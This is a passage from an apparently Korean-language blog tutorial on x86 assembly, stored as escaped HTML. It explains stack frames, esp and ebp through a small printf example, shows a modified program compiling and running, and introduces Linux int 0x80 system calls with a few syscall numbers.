ret\uc2dc \ud658\uc6d0\uc704\ud568<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"movl %esp, %ebp \"><FONT size=2>movl<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN>%esp, %ebp<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" old \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>old<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \ud604\uc7ac\uc758 esp\ub97c ebp\ub85c \uc124\uc815.(\ud55c \ud568\uc218\ub0b4\uc5d0\uc11c \uc77c\uc815) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>\ud604\uc7ac\uc758 esp\ub97c ebp\ub85c \uc124\uc815.(\ud55c \ud568\uc218\ub0b4\uc5d0\uc11c \uc77c\uc815)<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"subl $4, %esp \"><FONT size=2>subl<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN>$4, %esp<SPAN 
style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \ubcc0\uc218\uac12 \uc800\uc7a5\uc744 \uc704\ud574 stack\uacf5\uac04 \ud655\ubcf4(int 4bytes) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>\ubcc0\uc218\uac12 \uc800\uc7a5\uc744 \uc704\ud574 stack\uacf5\uac04 \ud655\ubcf4(int 4bytes)<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"movl $1, -4(%ebp) \"><FONT size=2>movl<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN>$1, -4(%ebp)<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x08<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x04<\/FONT><\/TD>\n<TD 
style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" ebp\uae30\uc900 -4\ubc14\uc774\ud2b8 \uc704\uce58\uc5d0 1\uc744 \ub123\uc74c.(a=1) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>ebp\uae30\uc900 -4\ubc14\uc774\ud2b8 \uc704\uce58\uc5d0 1\uc744 \ub123\uc74c.(a=1)<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"pushl -4(%ebp) \"><FONT size=2>pushl<SPAN style=\"mso-spacerun: yes\">&nbsp;&nbsp; <\/SPAN>-4(%ebp)<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x08<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" ebp\uae30\uc900 -4\uc704\uce58\uc758 \uac12\uc744 stack\uc5d0 \ub123\uc74c \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>ebp\uae30\uc900 -4\uc704\uce58\uc758 \uac12\uc744 stack\uc5d0 \ub123\uc74c<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD 
style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"pushl $.LC0 \"><FONT size=2>pushl<SPAN style=\"mso-spacerun: yes\">&nbsp;&nbsp; <\/SPAN>$.LC0<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x0c<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=' .LC0\uc8fc\uc18c\uac12\uc744 stack\uc5d0 \ub123\uc74c (\" a is %d \\n\") '><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>.LC0\uc8fc\uc18c\uac12\uc744 stack\uc5d0 \ub123\uc74c (\" a is %d \\n\")<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"call printf \"><FONT size=2>call<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN>printf<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT 
size=2>-0x10<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" printf()\ud568\uc218\ub97c \ubd80\ub984 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>printf()\ud568\uc218\ub97c \ubd80\ub984<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"addl $8, %esp \"><FONT size=2>addl<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN>$8, %esp<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x10<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" esp\ub97c 8\ubc14\uc774\ud2b8 \ub354\ud568 (\ud654\uc6d0\ud568) \"><FONT size=2><SPAN 
style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>esp\ub97c 8\ubc14\uc774\ud2b8 \ub354\ud568 (\ud654\uc6d0\ud568)<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"leave \"><FONT size=2>leave<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x08<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \"><SPAN style=\"mso-spacerun: yes\"><FONT size=2>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/FONT><\/SPAN><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"ret \"><FONT size=2>ret<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: 
windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x00<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" old \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>old<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \ubcf5\uadc0.(return) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>\ubcf5\uadc0.(return)<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR><\/TBODY><\/TABLE>\n\n<P>&nbsp;<\/P>\n<P><br \/>\uc5b4\uc148\ube14\ub9ac\uc5d0\uc11c \uac00\uc7a5 \ud63c\ub3c8\ud558\uae30 \uc26c\uc6b4 \ubd80\ubd84\uc774 stack\uc5d0 \uc313\uc774\ub294 data\uc758 \uc704\uce58\uc774\ub2e4. 
C\uc5b8\uc5b4\uc758 \uacbd\uc6b0\uc5d0 data\uac00 <br \/>\uc800\uc7a5\ub418\ub294 \uc808\ub300\uac12\uc744 \ud45c\uc2dc\ud558\uae30 \ub54c\ubb38\uc5d0 \uc5b4\ub824\uc6c0\uc774 \uc5c6\uc73c\ub098 \uc5b4\uc148\ube14\ub9ac\uc758 \uacbd\uc6b0\uc5d0\ub294 push, sub, add,ret\ub4f1\uc758&nbsp; <br \/>\uba85\ub839\uc5b4\ub97c \uc808\ub300\uc8fc\uc18c \uc5c6\uc774 \uc218\ud589\ud558\uc5ec\ub3c4 \uc21c\uc11c\uc5d0 \uc758\ud574 stack\uac00\uac10 \ub41c\ub2e4.&nbsp; esp\ub294 stack\uc5d0\uc11c data\uac00 \uc313\uc5ec <br \/>\uc788\ub294 \uc81c\uc77c \ub05d \uc8fc\uc18c\ub97c \ud45c\uc2dc\ud558\ubbc0\ub85c data\uc758 \uc99d\uac10\uc5d0 \ub530\ub77c esp\ub3c4 \uacc4\uc18d \ubcc0\ud558\uac8c \ub41c\ub2e4.&nbsp; data\uc758 \ucc98\ub9ac\ub294 \ub54c\ub860 <br \/>\ud2b9\uc815 \uc704\uce58\uc758 \uac12\uc744 \ucc38\uc870\ud558\uac70\ub098 \ubcc0\uacbd\uc2dc\ucf1c\uc57c \ud558\ub294 \uacbd\uc6b0\uac00 \uc788\ub294\ub370 (\uc704\uc5d0\uc11c pushl -4(%ebp) \uac19\uc740 \uacbd\uc6b0)&nbsp; <br \/>\uc774\ub7f4\ub54c \ub9e4 \uc21c\uac04 \ubcc0\ud654\ud558\ub294 esp\ub97c \uae30\uc900\uc73c\ub85c \uc0c1\ub300\uc8fc\uc18c\uac12\uc744 \uc7a1\uae30\uac00 \uc27d\uc9c0 \uc54a\ub2e4. \uadf8\ub7ec\ud55c \uc774\uc720\uc5d0\uc11c \ud55c&nbsp; <br \/>\ud568\uc218(function)\ub0b4\uc5d0\uc11c \uae30\uc900\uc774 \ub418\ub294 \ud55c \uc8fc\uc18c\ub97c \uc124\uc815\ud558\ub294\ub370 \uadf8\uac83\uc774 \ubc14\ub85c ebp\uc774\ub2e4. \uc704 \ub3c4\ud45c\ub97c \ubcf4\uba74 \ud568\uc218 <br \/>(main)\uc5d0 \ub4e4\uc5b4\uc640\uc11c \uccab\ubc88\uc9f8\ub85c \ud558\ub294 \uacfc\uc815\uc774 \ubc14\ub85c \uc804\uc5d0 \uac00\uc9c0\uace0 \uc788\ub358 ebp\ub97c \uc800\uc7a5\ud558\uace0 \ucd08\uae30 esp\ub97c ebp\uc5d0 \uc800\uc7a5 <br \/>\ud574\uc11c \ud568\uc218\uac00 \ub05d\ub0a0\ub54c\uae4c\uc9c0 \uc77c\uc815\ud55c \uc8fc\uc18c\uac12\uc744 \uc720\uc9c0\ud558\ub294 \uac83\uc744 \ubcfc\uc218 \uc788\ub2e4. 
esp\uc640 ebp\ub294 \ud558\ub098\uc758 \ud568\uc218\uac00&nbsp; <br \/>\uc2e4\ud589\ub418\uc5c8\ub2e4\uac00 \ub05d\ub098\ub294 ret \uc2dc\uc810\uc5d0\uc11c\ub294 \ubaa8\ub450 \ucd08\uae30 \uac12\uc744 \uac16\uac8c \ub41c\ub2e4. <br \/>\ud504\ub85c\uadf8\ub7a8\uc758 \ud750\ub984\uc744 \ubcf4\uba74 ebp\ub97c \uc124\uc815\ud55c\ub4a4 a\uc758 \ubcc0\uc218\uac12\uc73c\ub85c 1\uc744 \ub123\uace0, \uadf8 a\uac12\uc744 stack\uc5d0 \uc800\uc7a5(pushl <br \/>-4(%ebp))\ud558\uace0 string \" a is %d \\n\"\uc744 stack\uc5d0 \uc800\uc7a5\ud55c \ub4a4 printf()\ud568\uc218\ub97c call\ud55c\ub2e4. \uc774\ub294 \uc6d0\ub798 <br \/>printf(\" a is %d \\n\",a);\ub97c \ubcf4\uba74 \ud568\uc218\uc758 \ub9e4\uac1c\uc778\uc218\ub97c \ub4a4\ucabd\ubd80\ud130 stack\uc5d0 \ub123\ub294 \uac83\uc744 \ubcfc\uc218\uc788\ub2e4. <br \/><br \/>\uc870\uae08\ub354 \uc774\ud574\ub97c \ud558\uae30 \uc704\ud574 \uc5b4\uc148\ube14\ub9ac \ud504\ub85c\uadf8\ub7a8(test11.s)\uc744 \uc218\uc815\ud558\uc5ec \uc544\ub798\uc640 \uac19\uc740 C\uc5b8\uc5b4 \ud504\ub85c\uadf8\ub7a8\uc758 <br \/>\ucd9c\ub825 \uacb0\uacfc\uc640 \uac19\ub3c4\ub85d \ud574 \ubcf4\uc790..&nbsp; <br \/><br \/>--------------- C\uc5b8\uc5b4 --------------------- <br \/>&nbsp; int a=1, b=2; <br \/>&nbsp; printf(\"a=%d, b=%d \\n\",a,b); <br \/>------------------------------------------- <br \/><br \/>- \uba3c\uc800 string\ubd80\ubd84\uc740 \ubc14\uafbc\ub2e4.. \" a is %d \\n\" -&gt; \"a=%d, b=%d \\n\"&nbsp; <br \/>- ebp\ubd80\ubd84\uc740 \ubcc0\uacbd\ud560 \uac83\uc774 \uc5c6\uace0.. <br \/>- \ubcc0\uc218 \uc815\uc758 \ubd80\ubd84\uc744 \uc218\uc815\ud55c\ub2e4.&nbsp; int a (4\ubc14\uc774\ud2b8) -&gt; int a, b (8\ubc14\uc774\ud2b8) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; subl $4, %esp &nbsp; -&gt; subl $8, %esp <br \/>- a\ubcc0\uc218\uc5d0 1\uc744 \ub123\ub294\ub2e4. &nbsp; &nbsp; &nbsp; &nbsp; movl $1, -4(%ebp) <br \/>- b\ubcc0\uc218\uc5d0 2\ub97c \ub123\ub294\ub2e4. 
&nbsp; &nbsp; &nbsp; &nbsp; movl $2, -8(%ebp) <br \/>- b\uac12\uc744 stack\uc5d0 \ub123\ub294\ub2e4. &nbsp; &nbsp; &nbsp; pushl &nbsp; -8(%ebp) <br \/>- a\uac12\uc744 stack\uc5d0 \ub123\ub294\ub2e4. &nbsp; &nbsp; &nbsp; pushl &nbsp; -4(%ebp) <br \/>- string\ub77c\ubca8 \uc8fc\uc18c\ub97c push\ud55c\ub2e4. pushl &nbsp; $.LC0 <br \/>- call printf <br \/>- esp\uc704\uce58\ub97c \uc218\uc815. &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; addl&nbsp; $12, %esp <br \/><br \/>[willy@Null2Root] cat test12.s <br \/>.LC0: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \"a=%d, b=%d \\n\"&nbsp; <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; %ebp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %esp, %ebp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; subl &nbsp;&nbsp; $8, %esp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $1, -4(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $2, -8(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; -8(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; -4(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; $.LC0 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; call &nbsp;&nbsp; printf <br \/>&nbsp; &nbsp; &nbsp; &nbsp; addl &nbsp;&nbsp; $12, %esp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; leave <br \/>&nbsp; &nbsp; &nbsp; &nbsp; ret <br \/><br \/>[willy@Null2Root]gcc test12.s -o test12 <br \/><br \/>[willy@Null2Root]$ .\/test12 <br \/>a=1, b=2&nbsp; <br \/><br \/>\uc9c0\uae08\uae4c\uc9c0 \uac04\ub2e8\ud55c \uc5b4\uc148\ube14\ub9ac \ud504\ub85c\uadf8\ub7a8 \ubd84\uc11d\uc744 \ud1b5\ud558\uc5ec \uc2a4\ud0dd\uc758 \uad6c\uc870\uc640 esp, ebp\uc758 \ubcc0\ud654\uc640 \uc758\ubbf8\ub97c \uc774\ud574 <br \/>\ud560\uc218 \uc788\uc5c8\ub2e4. \uc774\uc81c\ubd80\ud130\ub294 system call\ub97c \uc774\uc6a9\ud55c \ucc98\ub9ac\uc5d0 \ub300\ud558\uc5ec \uc54c\uc544\ubcf4\uc790. 
<br \/><br \/>&lt;\uc5b4\uc148\ube14\ub9ac\uc5d0\uc11c \uc778\ud130\ub7fd\ud2b8\uc640 system call&gt; <br \/>system call\uc774\ub780 \uc2dc\uc2a4\ud15c\uc5d0 \ubbf8\ub9ac \ub9cc\ub4e4\uc5b4 \ub193\uc740 \ub8e8\ud2f4(\ud568\uc218)\ub97c \uc774\uc6a9\ud558\uc5ec \ucc98\ub9ac\ud558\ub294 \uac83\uc744 \ub9d0\ud55c\ub2e4. \ud638\ucd9c\uc740 <br \/>interrupt\ub97c \uc774\uc6a9\ud558\uba70 Linux\uc5d0\uc11c\ub294 \uc778\ud130\ub7fd\ud2b8 0x80(int $0x80)\uc744 \uc0ac\uc6a9\ud55c\ub2e4.&nbsp; system call\uc744 \ud558\ub294 \ubc29\ubc95 <br \/>\uc740 \ubbf8\ub9ac \uaddc\uc815\ub41c \ud391\uc158\ubc88\ud638\uc640 \uad00\ub828\ub41c \uc778\uc218\ub4e4\uc744 eax,ebx,ecx,edx.. \uc21c\uc73c\ub85c \ucc44\uc6cc \ub123\uc740\ub4a4 int $0x80\uc744&nbsp; <br \/>\ud568\uc73c\ub85c\uc368 \uac00\ub2a5\ud558\ub2e4. \ud568\uc218\ubc88\ud638\ub294 \ud56d\uc0c1 eax\uc5d0 \uc704\uce58\ud558\uba70 ebx\ubd80\ud130\ub294 \uc801\ub2f9\ud55c \uc778\uc218\ub4e4\uc774 \uc624\uac8c\ub41c\ub2e4.&nbsp; <br \/>Linux\uc5d0\uc11c\ub294 \/usr\/include\/asm\/unistd.h\uc5d0\uc11c system call\uad00\ub828 \ud568\uc218\ubc88\ud638\ub97c \uc815\uc758 \ud55c\ub2e4.&nbsp; \uba87\uac00\uc9c0 \ubcf4\uba74 <br \/>\ub2e4\uc74c\uacfc \uac19\ub2e4. (\uc774 \ubc88\ud638\ub294 32\ube44\ud2b8 x86 Linux\uc758 int $0x80 \uae30\uc900\uc774\uba70, \ub2e4\ub978 ABI\uc5d0\uc11c\ub294 \ub2ec\ub77c\uc9c4\ub2e4.) <br \/>&nbsp; <br \/>#define __NR_exit &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 1 <br \/>#define __NR_write &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; 4 <br \/>#define __NR_execve &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; 11 <br \/>#define __NR_setreuid &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; 70 <br \/>#define __NR_setregid &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; 71 <br \/><br \/>ebx,ecx,edx...\uc5d0 \uc5b4\ub5a4 \uac12\uc774 \ub4e4\uc5b4\uac00\ub294\uc9c0\ub294 \ud568\uc218\ubc88\ud638(eax\uc5d0 \ub4e4\uc5b4\uac00\ub294 \uac12)\uc5d0 \uc758\uc874\ud558\uc5ec \uc124\uc815\ub418\uac8c \ub418\uba70 <br \/>System Call Table(http:\/\/quaff.port5.com\/syscall_list.html)\uc744 \ucc38\uc870\ud558\uba74 \uc54c\uc218\uc788\ub2e4. 
